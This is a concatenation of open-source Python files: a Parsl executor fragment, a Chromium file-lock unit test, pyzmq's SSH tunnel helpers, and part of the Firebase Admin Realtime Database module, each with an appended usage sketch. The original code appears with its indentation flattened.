internal_block = self.provider.submit(launch_cmd, 1)
logger.debug("Launched block {}->{}".format(external_block_id, internal_block))
if not internal_block:
raise(ScalingFailed(self.provider.label,
"Attempts to provision nodes via provider has failed"))
r.extend([external_block_id])
self.blocks[external_block_id] = internal_block
return r
def scale_in(self, blocks=None, block_ids=[]):
"""Scale in the number of active blocks by specified amount.
The scale in method here is very rude. It doesn't give the workers
the opportunity to finish current tasks or cleanup. This is tracked
in issue #530
Parameters
----------
blocks : int
Number of blocks to terminate and scale_in by
block_ids : list
List of specific block ids to terminate. Optional
Raises:
NotImplementedError
"""
if block_ids:
block_ids_to_kill = block_ids
else:
block_ids_to_kill = list(self.blocks.keys())[:blocks]
# Hold the block
for block_id in block_ids_to_kill:
self._hold_block(block_id)
# Now kill via provider
to_kill = [self.blocks.pop(bid) for bid in block_ids_to_kill]
r = self.provider.cancel(to_kill)
return r
def status(self):
"""Return status of all blocks."""
status = self.provider.status(list(self.blocks.values()))
return status
def shutdown(self, hub=True, targets='all', block=False):
"""Shutdown the executor, including all workers and controllers.
This is not implemented.
Kwargs:
- hub (Bool): Whether the hub should be shutdown, Default: True,
- targets (list of ints| 'all'): List of block id's to kill, Default: 'all'
- block (Bool): To block for confirmations or not
Raises:
NotImplementedError
"""
logger.info("Attempting HighThroughputExecutor shutdown")
# self.outgoing_q.close()
# self.incoming_q.close()
self.queue_proc.terminate()
logger.info("Finished HighThroughputExecutor shutdown attempt")
return True
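# --- Illustrative usage sketch (not part of the original module) ---
# A minimal example of wiring this executor into a Parsl configuration,
# assuming the usual Parsl entry points (parsl.config.Config, parsl.load and
# the python_app decorator). Parameter values below are arbitrary choices
# based on the docstring above, not the canonical setup.
if __name__ == '__main__':
    import parsl
    from parsl.config import Config
    from parsl.app.app import python_app

    config = Config(executors=[
        HighThroughputExecutor(
            label='htex_local',       # free-form label, also used in log paths
            cores_per_worker=1.0,     # one worker per core
            max_workers=4,            # cap on workers per node
            heartbeat_period=30,
            heartbeat_threshold=120,
        )
    ])
    parsl.load(config)

    @python_app
    def double(x):
        return 2 * x

    # Calling the app submits to the executor and returns a Future.
    print(double(21).result())  # -> 42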
|
lock_unittest.py
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
import os
import tempfile
import time
import unittest
from py_utils import lock
from six.moves import range # pylint: disable=redefined-builtin
def _AppendTextToFile(file_name):
with open(file_name, 'a') as f:
lock.AcquireFileLock(f, lock.LOCK_EX)
# Sleep 100 ms to increase the chance of another process trying to acquire
# the lock on the file at the same time.
time.sleep(0.1)
f.write('Start')
for _ in range(10000):
f.write('*')
f.write('End')
def _ReadFileWithSharedLockBlockingThenWrite(read_file, write_file):
with open(read_file, 'r') as f:
lock.AcquireFileLock(f, lock.LOCK_SH)
content = f.read()
with open(write_file, 'a') as f2:
lock.AcquireFileLock(f2, lock.LOCK_EX)
f2.write(content)
def _ReadFileWithExclusiveLockNonBlocking(target_file, status_file):
with open(target_file, 'r') as f:
try:
lock.AcquireFileLock(f, lock.LOCK_EX | lock.LOCK_NB)
with open(status_file, 'w') as f2:
f2.write('LockException was not raised')
except lock.LockException:
with open(status_file, 'w') as f2:
f2.write('LockException raised')
class FileLockTest(unittest.TestCase):
def setUp(self):
tf = tempfile.NamedTemporaryFile(delete=False)
tf.close()
self.temp_file_path = tf.name
def tearDown(self):
os.remove(self.temp_file_path)
def testExclusiveLock(self):
processess = []
for _ in range(10):
p = multiprocessing.Process(
target=_AppendTextToFile, args=(self.temp_file_path,))
p.start()
processess.append(p)
for p in processess:
p.join()
# If the file lock works as expected, there should be 10 atomic writes of
# 'Start***...***End' to the file in some order, which leads to the final
# file content below.
expected_file_content = ''.join((['Start'] + ['*']*10000 + ['End']) * 10)
with open(self.temp_file_path, 'r') as f:
# Use assertTrue instead of assertEquals since the strings are big, hence
# assertEquals's assertion failure will contain huge strings.
self.assertTrue(expected_file_content == f.read())
def testSharedLock(self):
tf = tempfile.NamedTemporaryFile(delete=False)
tf.close()
temp_write_file = tf.name
try:
with open(self.temp_file_path, 'w') as f:
f.write('0123456789')
with open(self.temp_file_path, 'r') as f:
# First, acquire a shared lock on temp_file_path
lock.AcquireFileLock(f, lock.LOCK_SH)
processess = []
# Create 10 processes that also try to acquire a shared lock on
# temp_file_path and then append temp_file_path's content to temp_write_file.
for _ in range(10):
p = multiprocessing.Process(
target=_ReadFileWithSharedLockBlockingThenWrite,
args=(self.temp_file_path, temp_write_file))
p.start()
processess.append(p)
for p in processess:
p.join()
# temp_write_file should contain 10 copies of temp_file_path's content.
with open(temp_write_file, 'r') as f:
self.assertEquals('0123456789'*10, f.read())
finally:
os.remove(temp_write_file)
def testNonBlockingLockAcquiring(self):
tf = tempfile.NamedTemporaryFile(delete=False)
tf.close()
temp_status_file = tf.name
try:
with open(self.temp_file_path, 'w') as f:
lock.AcquireFileLock(f, lock.LOCK_EX)
p = multiprocessing.Process(
target=_ReadFileWithExclusiveLockNonBlocking,
args=(self.temp_file_path, temp_status_file))
p.start()
p.join()
with open(temp_status_file, 'r') as f:
self.assertEquals('LockException raised', f.read())
finally:
os.remove(temp_status_file)
def testUnlockBeforeClosingFile(self):
tf = tempfile.NamedTemporaryFile(delete=False)
tf.close()
temp_status_file = tf.name
try:
with open(self.temp_file_path, 'r') as f:
lock.AcquireFileLock(f, lock.LOCK_SH)
lock.ReleaseFileLock(f)
p = multiprocessing.Process(
target=_ReadFileWithExclusiveLockNonBlocking,
args=(self.temp_file_path, temp_status_file))
p.start()
p.join()
with open(temp_status_file, 'r') as f:
self.assertEquals('LockException was not raised', f.read())
finally:
os.remove(temp_status_file)
def testContextualLock(self):
tf = tempfile.NamedTemporaryFile(delete=False)
tf.close()
temp_status_file = tf.name
try:
with open(self.temp_file_path, 'r') as f:
with lock.FileLock(f, lock.LOCK_EX):
# Within this block, accessing self.temp_file_path from another
# process should raise exception.
p = multiprocessing.Process(
target=_ReadFileWithExclusiveLockNonBlocking,
args=(self.temp_file_path, temp_status_file))
p.start()
p.join()
with open(temp_status_file, 'r') as f:
self.assertEquals('LockException raised', f.read())
# Accessing self.temp_file_path here should not raise exception.
p = multiprocessing.Process(
target=_ReadFileWithExclusiveLockNonBlocking,
args=(self.temp_file_path, temp_status_file))
p.start()
p.join()
with open(temp_status_file, 'r') as f:
self.assertEquals('LockException was not raised', f.read())
finally:
os.remove(temp_status_file)
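# --- Illustrative sketch (not part of the test module) ---
# A minimal example of the py_utils.lock API exercised by the tests above:
# the FileLock context manager and the AcquireFileLock/ReleaseFileLock pair.
# The file name is a hypothetical placeholder.
def _example_lock_usage():
    with open('shared_state.txt', 'a') as f:  # hypothetical file
        # Exclusive lock for the duration of the block; released on exit.
        with lock.FileLock(f, lock.LOCK_EX):
            f.write('critical-section write\n')

    with open('shared_state.txt', 'r') as f:
        # Non-blocking shared lock; LockException means another process
        # currently holds an exclusive lock.
        try:
            lock.AcquireFileLock(f, lock.LOCK_SH | lock.LOCK_NB)
        except lock.LockException:
            return None
        try:
            return f.read()
        finally:
            lock.ReleaseFileLock(f)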
|
tunnel.py
|
"""Basic ssh tunnel utilities, and convenience functions for tunneling
zeromq connections.
"""
# Copyright (C) 2010-2011 IPython Development Team
# Copyright (C) 2011- PyZMQ Developers
#
# Redistributed from IPython under the terms of the BSD License.
from __future__ import print_function
import atexit
import os
import re
import signal
import socket
import sys
import warnings
from getpass import getpass, getuser
from multiprocessing import Process
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
import paramiko
SSHException = paramiko.ssh_exception.SSHException
except ImportError:
paramiko = None
class SSHException(Exception):
pass
else:
from .forward import forward_tunnel
try:
import pexpect
except ImportError:
pexpect = None
from ..utils.strtypes import b
def select_random_ports(n):
"""Select and return n random ports that are available."""
ports = []
sockets = []
for i in range(n):
sock = socket.socket()
sock.bind(('', 0))
ports.append(sock.getsockname()[1])
sockets.append(sock)
for sock in sockets:
sock.close()
return ports
#-----------------------------------------------------------------------------
# Check for passwordless login
#-----------------------------------------------------------------------------
_password_pat = re.compile(b(r'pass(word|phrase):'), re.IGNORECASE)
def try_passwordless_ssh(server, keyfile, paramiko=None):
"""Attempt to make an ssh connection without a password.
This is mainly used for requiring password input only once
when many tunnels may be connected to the same server.
If paramiko is None, the default for the platform is chosen.
"""
if paramiko is None:
paramiko = sys.platform == 'win32'
if not paramiko:
f = _try_passwordless_openssh
else:
f = _try_passwordless_paramiko
return f(server, keyfile)
def _try_passwordless_openssh(server, keyfile):
"""Try passwordless login with shell ssh command."""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko")
cmd = 'ssh -f '+ server
if keyfile:
cmd += ' -i ' + keyfile
cmd += ' exit'
# pop SSH_ASKPASS from env
env = os.environ.copy()
env.pop('SSH_ASKPASS', None)
ssh_newkey = 'Are you sure you want to continue connecting'
p = pexpect.spawn(cmd, env=env)
while True:
try:
i = p.expect([ssh_newkey, _password_pat], timeout=.1)
if i==0:
raise SSHException('The authenticity of the host can\'t be established.')
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
return True
else:
return False
def _try_passwordless_paramiko(server, keyfile):
"""Try passwordless login with paramiko."""
if paramiko is None:
msg = "Paramiko unavailable, "
if sys.platform == 'win32':
msg += "Paramiko is required for ssh tunneled connections on Windows."
else:
msg += "use OpenSSH."
raise ImportError(msg)
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True)
except paramiko.AuthenticationException:
return False
else:
client.close()
return True
def tunnel_connection(socket, addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Connect a socket to an address via an ssh tunnel.
This is a wrapper for socket.connect(addr), when addr is not accessible
from the local machine. It simply creates an ssh tunnel using the remaining args,
and calls socket.connect('tcp://localhost:lport') where lport is the randomly
selected local port of the tunnel.
"""
new_url, tunnel = open_tunnel(addr, server, keyfile=keyfile, password=password, paramiko=paramiko, timeout=timeout)
socket.connect(new_url)
return tunnel
def open_tunnel(addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Open a tunneled connection from a 0MQ url.
For use inside tunnel_connection.
Returns
-------
(url, tunnel) : (str, object)
The 0MQ url that has been forwarded, and the tunnel object
"""
lport = select_random_ports(1)[0]
transport, addr = addr.split('://')
ip,rport = addr.split(':')
rport = int(rport)
if paramiko is None:
paramiko = sys.platform == 'win32'
if paramiko:
tunnelf = paramiko_tunnel
else:
tunnelf = openssh_tunnel
tunnel = tunnelf(lport, rport, server, remoteip=ip, keyfile=keyfile, password=password, timeout=timeout)
return 'tcp://127.0.0.1:%i'%lport, tunnel
def openssh_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""Create an ssh tunnel using command-line ssh that connects port lport
on this machine to localhost:rport on server. The tunnel
will automatically close when not in use, remaining open
for a minimum of timeout seconds for an initial connection.
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko_tunnel")
ssh="ssh "
if keyfile:
ssh += "-i " + keyfile
if ':' in server:
server, port = server.split(':')
ssh += " -p %s" % port
cmd = "%s -O check %s" % (ssh, server)
(output, exitstatus) = pexpect.run(cmd, withexitstatus=True)
if not exitstatus:
pid = int(output[output.find(b"(pid=")+5:output.find(b")")])
cmd = "%s -O forward -L 127.0.0.1:%i:%s:%i %s" % (
ssh, lport, remoteip, rport, server)
(output, exitstatus) = pexpect.run(cmd, withexitstatus=True)
if not exitstatus:
atexit.register(_stop_tunnel, cmd.replace("-O forward", "-O cancel", 1))
return pid
cmd = "%s -f -S none -L 127.0.0.1:%i:%s:%i %s sleep %i" % (
ssh, lport, remoteip, rport, server, timeout)
# pop SSH_ASKPASS from env
env = os.environ.copy()
env.pop('SSH_ASKPASS', None)
ssh_newkey = 'Are you sure you want to continue connecting'
tunnel = pexpect.spawn(cmd, env=env)
failed = False
while True:
try:
i = tunnel.expect([ssh_newkey, _password_pat], timeout=.1)
if i==0:
raise SSHException('The authenticity of the host can\'t be established.')
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
if tunnel.exitstatus:
print(tunnel.exitstatus)
print(tunnel.before)
print(tunnel.after)
raise RuntimeError("tunnel '%s' failed to start"%(cmd))
else:
return tunnel.pid
else:
if failed:
print("Password rejected, try again")
password=None
if password is None:
password = getpass("%s's password: "%(server))
tunnel.sendline(password)
failed = True
def _stop_tunnel(cmd):
pexpect.run(cmd)
def _split_server(server):
if '@' in server:
username,server = server.split('@', 1)
else:
username = getuser()
if ':' in server:
server, port = server.split(':')
port = int(port)
else:
port = 22
return username, server, port
def paramiko_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""launch a tunner with paramiko in a subprocess. This should only be used
when shell ssh is unavailable (e.g. Windows).
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
If you are familiar with ssh tunnels, this creates the tunnel:
ssh server -L localhost:lport:remoteip:rport
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if paramiko is None:
raise ImportError("Paramiko not available")
if password is None:
if not _try_passwordless_paramiko(server, keyfile):
password = getpass("%s's password: "%(server))
p = Process(target=_paramiko_tunnel,
args=(lport, rport, server, remoteip),
kwargs=dict(keyfile=keyfile, password=password))
p.daemon = True
p.start()
return p
def _paramiko_tunnel(lport, rport, server, remoteip, keyfile=None, password=None):
"""Function for actually starting a paramiko tunnel, to be passed
to multiprocessing.Process(target=this), and not called directly.
"""
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True, password=password)
# except paramiko.AuthenticationException:
# if password is None:
# password = getpass("%s@%s's password: "%(username, server))
# client.connect(server, port, username=username, password=password)
# else:
# raise
except Exception as e:
print('*** Failed to connect to %s:%d: %r' % (server, port, e))
sys.exit(1)
# Don't let SIGINT kill the tunnel subprocess
signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
forward_tunnel(lport, remoteip, rport, client.get_transport())
except KeyboardInterrupt:
print('SIGINT: Port forwarding stopped cleanly')
sys.exit(0)
except Exception as e:
print("Port forwarding stopped uncleanly: %s"%e)
sys.exit(255)
if sys.platform == 'win32':
ssh_tunnel = paramiko_tunnel
else:
ssh_tunnel = openssh_tunnel
__all__ = ['tunnel_connection', 'ssh_tunnel', 'openssh_tunnel', 'paramiko_tunnel', 'try_passwordless_ssh']
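# --- Illustrative sketch (not part of the original module) ---
# A minimal example of tunneling a pyzmq REQ socket through the platform's
# default tunnel implementation via tunnel_connection(). The host names and
# port below are hypothetical placeholders; without a keyfile, ssh config
# defaults apply and a password prompt may appear.
def _example_tunnelled_request():
    import zmq
    ctx = zmq.Context.instance()
    sock = ctx.socket(zmq.REQ)
    # Forward tcp://10.0.0.5:5555 (as seen from gateway.example.com) to a
    # randomly chosen local port, then connect the socket through the tunnel.
    tunnel = tunnel_connection(
        sock,
        'tcp://10.0.0.5:5555',
        'user@gateway.example.com',
        timeout=60,
    )
    sock.send(b'ping')
    return sock.recv(), tunnel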
|
db.py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Firebase Realtime Database module.
This module contains functions and classes that facilitate interacting with the Firebase Realtime
Database. It supports basic data manipulation operations, as well as complex queries such as
limit queries and range queries. However, it does not support realtime update notifications. This
module uses the Firebase REST API underneath.
"""
import collections
import json
import os
import sys
import threading
from urllib import parse
import requests
import firebase_admin
from firebase_admin import exceptions
from firebase_admin import _http_client
from firebase_admin import _sseclient
from firebase_admin import _utils
_DB_ATTRIBUTE = '_database'
_INVALID_PATH_CHARACTERS = '[].?#$'
_RESERVED_FILTERS = ('$key', '$value', '$priority')
_USER_AGENT = 'Firebase/HTTP/{0}/{1}.{2}/AdminPython'.format(
firebase_admin.__version__, sys.version_info.major, sys.version_info.minor)
_TRANSACTION_MAX_RETRIES = 25
_EMULATOR_HOST_ENV_VAR = 'FIREBASE_DATABASE_EMULATOR_HOST'
def reference(path='/', app=None, url=None):
"""Returns a database ``Reference`` representing the node at the specified path.
If no path is specified, this function returns a ``Reference`` that represents the database
root. By default, the returned References provide access to the Firebase Database specified at
app initialization. To connect to a different database instance in the same Firebase project,
specify the ``url`` parameter.
Args:
path: Path to a node in the Firebase realtime database (optional).
app: An App instance (optional).
url: Base URL of the Firebase Database instance (optional). When specified, takes
precedence over the ``databaseURL`` option set at app initialization.
Returns:
Reference: A newly initialized Reference.
Raises:
ValueError: If the specified path or app is invalid.
"""
service = _utils.get_app_service(app, _DB_ATTRIBUTE, _DatabaseService)
client = service.get_client(url)
return Reference(client=client, path=path)
def _parse_path(path):
"""Parses a path string into a set of segments."""
if not isinstance(path, str):
raise ValueError('Invalid path: "{0}". Path must be a string.'.format(path))
if any(ch in path for ch in _INVALID_PATH_CHARACTERS):
raise ValueError(
'Invalid path: "{0}". Path contains illegal characters.'.format(path))
return [seg for seg in path.split('/') if seg]
class Event:
"""Represents a realtime update event received from the database."""
def __init__(self, sse_event):
self._sse_event = sse_event
self._data = json.loads(sse_event.data)
@property
def data(self):
"""Parsed JSON data of this event."""
return self._data['data']
@property
def path(self):
"""Path of the database reference that triggered this event."""
return self._data['path']
@property
def event_type(self):
"""Event type string (put, patch)."""
return self._sse_event.event_type
class ListenerRegistration:
"""Represents the addition of an event listener to a database reference."""
def __init__(self, callback, sse):
"""Initializes a new listener with given parameters.
This is an internal API. Use the ``db.Reference.listen()`` method to start a
new listener.
Args:
callback: The callback function to fire in case of event.
sse: A transport session to make requests with.
"""
self._callback = callback
self._sse = sse
self._thread = threading.Thread(target=self._start_listen)
self._thread.start()
def _start_listen(self):
# iterate the sse client's generator
for sse_event in self._sse:
# only inject data events
if sse_event:
self._callback(Event(sse_event))
def close(self):
"""Stops the event listener represented by this registration
This closes the SSE HTTP connection, and joins the background thread.
"""
self._sse.close()
self._thread.join()
class Reference:
"""Reference represents a node in the Firebase realtime database."""
def __init__(self, **kwargs):
"""Creates a new Reference using the provided parameters.
This method is for internal use only. Use db.reference() to obtain an instance of
Reference.
"""
self._client = kwargs.get('client')
if 'segments' in kwargs:
self._segments = kwargs.get('segments')
else:
self._segments = _parse_path(kwargs.get('path'))
self._pathurl = '/' + '/'.join(self._segments)
@property
def key(self):
if self._segments:
return self._segments[-1]
return None
@property
def path(self):
return self._pathurl
@property
def parent(self):
if self._segments:
return Reference(client=self._client, segments=self._segments[:-1])
return None
def child(self, path):
"""Returns a Reference to the specified child node.
The path may point to an immediate child of the current Reference, or a deeply nested
child. Child paths must not begin with '/'.
Args:
path: Path to the child node.
Returns:
Reference: A database Reference representing the specified child node.
Raises:
ValueError: If the child path is not a string, not well-formed or begins with '/'.
"""
if not path or not isinstance(path, str):
raise ValueError(
'Invalid path argument: "{0}". Path must be a non-empty string.'.format(path))
if path.startswith('/'):
raise ValueError(
'Invalid path argument: "{0}". Child path must not start with "/"'.format(path))
full_path = self._pathurl + '/' + path
return Reference(client=self._client, path=full_path)
def get(self, etag=False, shallow=False):
"""Returns the value, and optionally the ETag, at the current location of the database.
Args:
etag: A boolean indicating whether the Etag value should be returned or not (optional).
shallow: A boolean indicating whether to execute a shallow read (optional). Shallow
reads do not retrieve the child nodes of the current database location. Cannot be
set to True if ``etag`` is also set to True.
Returns:
object: If etag is False returns the decoded JSON value of the current database location.
If etag is True, returns a 2-tuple consisting of the decoded JSON value and the Etag
associated with the current database location.
Raises:
ValueError: If both ``etag`` and ``shallow`` are set to True.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if etag:
if shallow:
raise ValueError('etag and shallow cannot both be set to True.')
headers, data = self._client.headers_and_body(
'get', self._add_suffix(), headers={'X-Firebase-ETag' : 'true'})
return data, headers.get('ETag')
params = 'shallow=true' if shallow else None
return self._client.body('get', self._add_suffix(), params=params)
def get_if_changed(self, etag):
"""Gets data in this location only if the specified ETag does not match.
Args:
etag: The ETag value to be checked against the ETag of the current location.
Returns:
tuple: A 3-tuple consisting of a boolean, a decoded JSON value and an ETag. If the ETag
specified by the caller did not match, the boolean value will be True and the JSON
and ETag values would reflect the corresponding values in the database. If the ETag
matched, the boolean value will be False and the other elements of the tuple will be
None.
Raises:
ValueError: If the ETag is not a string.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if not isinstance(etag, str):
raise ValueError('ETag must be a string.')
resp = self._client.request('get', self._add_suffix(), headers={'if-none-match': etag})
if resp.status_code == 304:
return False, None, None
return True, resp.json(), resp.headers.get('ETag')
def set(self, value):
"""Sets the data at this location to the given value.
The value must be JSON-serializable and not None.
Args:
value: JSON-serializable value to be set at this location.
Raises:
ValueError: If the provided value is None.
TypeError: If the value is not JSON-serializable.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if value is None:
raise ValueError('Value must not be None.')
self._client.request('put', self._add_suffix(), json=value, params='print=silent')
def set_if_unchanged(self, expected_etag, value):
"""Conditonally sets the data at this location to the given value.
Sets the data at this location to the given value only if ``expected_etag`` is same as the
ETag value in the database.
Args:
expected_etag: Value of ETag we want to check.
value: JSON-serializable value to be set at this location.
Returns:
tuple: A 3-tuple consisting of a boolean, a decoded JSON value and an ETag. The boolean
indicates whether the set operation was successful or not. The decoded JSON and the
ETag correspond to the latest value in this database location.
Raises:
ValueError: If the value is None, or if expected_etag is not a string.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
# pylint: disable=missing-raises-doc
if not isinstance(expected_etag, str):
raise ValueError('Expected ETag must be a string.')
if value is None:
raise ValueError('Value must not be None.')
try:
headers = self._client.headers(
'put', self._add_suffix(), json=value, headers={'if-match': expected_etag})
return True, value, headers.get('ETag')
except exceptions.FailedPreconditionError as error:
http_response = error.http_response
if http_response is not None and 'ETag' in http_response.headers:
etag = http_response.headers['ETag']
snapshot = http_response.json()
return False, snapshot, etag
raise error
def push(self, value=''):
"""Creates a new child node.
The optional value argument can be used to provide an initial value for the child node. If
no value is provided, the child node will have an empty string as its default value.
Args:
value: JSON-serializable initial value for the child node (optional).
Returns:
Reference: A Reference representing the newly created child node.
Raises:
ValueError: If the value is None.
TypeError: If the value is not JSON-serializable.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if value is None:
raise ValueError('Value must not be None.')
output = self._client.body('post', self._add_suffix(), json=value)
push_id = output.get('name')
return self.child(push_id)
def update(self, value):
"""Updates the specified child keys of this Reference to the provided values.
Args:
value: A dictionary containing the child keys to update, and their new values.
Raises:
ValueError: If value is empty or not a dictionary.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if not value or not isinstance(value, dict):
raise ValueError('Value argument must be a non-empty dictionary.')
if None in value.keys():
raise ValueError('Dictionary must not contain None keys.')
self._client.request('patch', self._add_suffix(), json=value, params='print=silent')
def delete(self):
"""Deletes this node from the database.
Raises:
FirebaseError: If an error occurs while communicating with the remote database server.
"""
self._client.request('delete', self._add_suffix())
def listen(self, callback):
"""Registers the ``callback`` function to receive realtime updates.
The specified callback function will get invoked with ``db.Event`` objects for each
realtime update received from the database. It will also get called whenever the SDK
reconnects to the server due to network issues or credential expiration. In general,
the OAuth2 credentials used to authorize connections to the server expire every hour.
Therefore clients should expect the ``callback`` to fire at least once every hour, even if
there are no updates in the database.
This API is based on the event streaming support available in the Firebase REST API. Each
call to ``listen()`` starts a new HTTP connection and a background thread. This is an
experimental feature. It currently does not honor the auth overrides and timeout settings.
Cannot be used in thread-constrained environments like Google App Engine.
Args:
callback: A function to be called when a data change is detected.
Returns:
ListenerRegistration: An object that can be used to stop the event listener.
Raises:
FirebaseError: If an error occurs while starting the initial HTTP connection.
"""
return self._listen_with_session(callback)
def transaction(self, transaction_update):
"""Atomically modifies the data at this location.
Unlike a normal ``set()``, which just overwrites the data regardless of its previous state,
``transaction()`` is used to modify the existing value to a new value, ensuring there are
no conflicts with other clients simultaneously writing to the same location.
This is accomplished by passing an update function which is used to transform the current
value of this reference into a new value. If another client writes to this location before
the new value is successfully saved, the update function is called again with the new
current value, and the write will be retried. In case of repeated failures, this method
will retry the transaction up to 25 times before giving up and raising a
TransactionAbortedError. The update function may also force an early abort by raising an
exception instead of returning a value.
Args:
transaction_update: A function which will be passed the current data stored at this
location. The function should return the new value it would like written. If
an exception is raised, the transaction will be aborted, and the data at this
location will not be modified. The exceptions raised by this function are
propagated to the caller of the transaction method.
Returns:
object: New value of the current database Reference (only if the transaction commits).
Raises:
TransactionAbortedError: If the transaction aborts after exhausting all retry attempts.
ValueError: If transaction_update is not a function.
"""
if not callable(transaction_update):
raise ValueError('transaction_update must be a function.')
tries = 0
data, etag = self.get(etag=True)
while tries < _TRANSACTION_MAX_RETRIES:
new_data = transaction_update(data)
success, data, etag = self.set_if_unchanged(etag, new_data)
if success:
return new_data
tries += 1
raise TransactionAbortedError('Transaction aborted after failed retries.')
def order_by_child(self, path):
"""Returns a Query that orders data by child values.
Returned Query can be used to set additional parameters, and execute complex database
queries (e.g. limit queries, range queries).
Args:
path: Path to a valid child of the current Reference.
Returns:
Query: A database Query instance.
Raises:
ValueError: If the child path is not a string, not well-formed or None.
"""
if path in _RESERVED_FILTERS:
raise ValueError('Illegal child path: {0}'.format(path))
return Query(order_by=path, client=self._client, pathurl=self._add_suffix())
def order_by_key(self):
"""Creates a Query that orderes data by key.
Returned Query can be used to set additional parameters, and execute complex database
queries (e.g. limit queries, range queries).
Returns:
Query: A database Query instance.
"""
return Query(order_by='$key', client=self._client, pathurl=self._add_suffix())
def order_by_value(self):
"""Creates a Query that orderes data by value.
Returned Query can be used to set additional parameters, and execute complex database
queries (e.g. limit queries, range queries).
Returns:
Query: A database Query instance.
"""
return Query(order_by='$value', client=self._client, pathurl=self._add_suffix())
def _add_suffix(self, suffix='.json'):
return self._pathurl + suffix
def _listen_with_session(self, callback, session=None):
url = self._client.base_url + self._add_suffix()
if not session:
session = self._client.create_listener_session()
try:
sse = _sseclient.SSEClient(url, session)
return ListenerRegistration(callback, sse)
except requests.exceptions.RequestException as error:
raise _Client.handle_rtdb_error(error)
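# --- Illustrative sketch (not part of the original module) ---
# A minimal example of the Reference API defined above, assuming the app has
# already been initialized elsewhere with firebase_admin.initialize_app() and
# a databaseURL option. The path and payloads are hypothetical.
def _example_reference_usage():
    users = reference('users')                          # node at /users
    new_user = users.push({'name': 'Ada', 'score': 0})  # child with auto-generated key
    new_user.update({'score': 10})                      # partial update of child keys
    snapshot = users.child(new_user.key).get()          # read the node back

    # Atomically increment the score; set_if_unchanged() retries on
    # concurrent writes, up to _TRANSACTION_MAX_RETRIES attempts.
    def bump(current):
        current = current or {'score': 0}
        current['score'] = current.get('score', 0) + 1
        return current

    users.child(new_user.key).transaction(bump)
    return snapshot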
class Query:
"""Represents a complex query that can be executed on a Reference.
Complex queries can consist of up to 2 components: a required ordering constraint, and an
optional filtering constraint. At the server, data is first sorted according to the given
ordering constraint (e.g. order by child). Then the filtering constraint (e.g. limit, range)
is applied on the sorted data to produce the final result. Despite the ordering constraint,
the final result is returned by the server as an unordered collection. Therefore the Query
interface performs another round of sorting at the client-side before returning the results
to the caller. These client-side sorted results are returned to the user as a Python
OrderedDict.
"""
def __init__(self, **kwargs):
order_by = kwargs.pop('order_by')
if not order_by or not isinstance(order_by, str):
raise ValueError('order_by field must be a non-empty string')
if order_by not in _RESERVED_FILTERS:
if order_by.startswith('/'):
raise ValueError('Invalid path argument: "{0}". Child path must not start '
'with "/"'.format(order_by))
segments = _parse_path(order_by)
order_by = '/'.join(segments)
self._client = kwargs.pop('client')
self._pathurl = kwargs.pop('pathurl')
self._order_by = order_by
self._params = {'orderBy' : json.dumps(order_by)}
if kwargs:
raise ValueError('Unexpected keyword arguments: {0}'.format(kwargs))
def limit_to_first(self, limit):
"""Creates a query with limit, and anchors it to the start of the window.
Args:
limit: The maximum number of child nodes to return.
Returns:
